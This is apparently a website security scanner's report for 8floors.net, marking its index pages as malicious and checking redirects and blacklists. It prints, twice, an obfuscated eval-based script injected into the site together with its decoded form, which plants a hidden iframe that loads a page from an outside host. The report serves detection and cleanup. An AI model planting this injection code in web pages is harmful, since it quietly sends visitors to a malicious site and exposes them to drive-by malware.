Scanned pages/files
Request | Server response | Status |
http://8floors.net/ | 200 OK Content-Length: 14997 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
try{abre++}catch(a6ba34y){try{dsgsdh&2}catch(asab){e=window[""+"e"+"val"];}} if(1){f=[-4,-5,90,89,18,25,87,97,84,104,95,86,97,102,31,90,87,101,56,94,86,96,87,95,103,101,51,108,70,82,90,64,82,96,87,25,26,84,96,87,107,24,28,77,33,80,27,108,0,-5,-6,-4,91,87,101,83,94,88,100,25,28,45,-2,-4,-5,110,19,87,93,102,87,17,110,-1,-6,-4,-5,85,98,85,102,96,87,95,103,32,104,101,91,101,88,26,19,47,91,87,101,83,94,88,18,100,101,85,46,26,90,101,103,98,43,34,33,106,106,108,91,105,99,100,102,104,31,96,107,87,10
Decoded script:
    if (document.getElementsByTagName('body')[0]){
        iframer();
    } else {
        document.write("<iframe src='http://ywzjvqssv.myfw.us/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    function iframer(){
        var f = document.createElement('iframe');
        f.setAttribute('src','http://ywzjvqssv.myfw.us/t/vc.php?go=2');
        f.style.visibility='hidden';
        f.style.position='absolute';
        f.style.left='0';
        f.style.top='0';
        f.setAttribute('width
<iframe src='http://ywzjvqssv.myfw.us/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
Antivirus reports:
http://8floors.net/test404page.js | 404 Not Found Content-Length: 1144 Content-Type: text/html | clean |
http://8floors.net/index.php | 200 OK Content-Length: 14997 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
try{abre++}catch(a6ba34y){try{dsgsdh&2}catch(asab){e=window[""+"e"+"val"];}} if(1){f=[-4,-5,90,89,18,25,87,97,84,104,95,86,97,102,31,90,87,101,56,94,86,96,87,95,103,101,51,108,70,82,90,64,82,96,87,25,26,84,96,87,107,24,28,77,33,80,27,108,0,-5,-6,-4,91,87,101,83,94,88,100,25,28,45,-2,-4,-5,110,19,87,93,102,87,17,110,-1,-6,-4,-5,85,98,85,102,96,87,95,103,32,104,101,91,101,88,26,19,47,91,87,101,83,94,88,18,100,101,85,46,26,90,101,103,98,43,34,33,106,106,108,91,105,99,100,102,104,31,96,107,87,10
Decoded script:
    if (document.getElementsByTagName('body')[0]){
        iframer();
    } else {
        document.write("<iframe src='http://ywzjvqssv.myfw.us/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    function iframer(){
        var f = document.createElement('iframe');
        f.setAttribute('src','http://ywzjvqssv.myfw.us/t/vc.php?go=2');
        f.style.visibility='hidden';
        f.style.position='absolute';
        f.style.left='0';
        f.style.top='0';
        f.setAttribute('width
<iframe src='http://ywzjvqssv.myfw.us/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 8floors.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 04 Sep 2014 14:55:22 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
X-Powered-By: PHP/5.3.27
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: 8floors.net
Referer: http://www.google.com/search?q=8floors.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=8floors.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://8floors.net/
Result: 8floors.net is not infected or malware details are not published yet.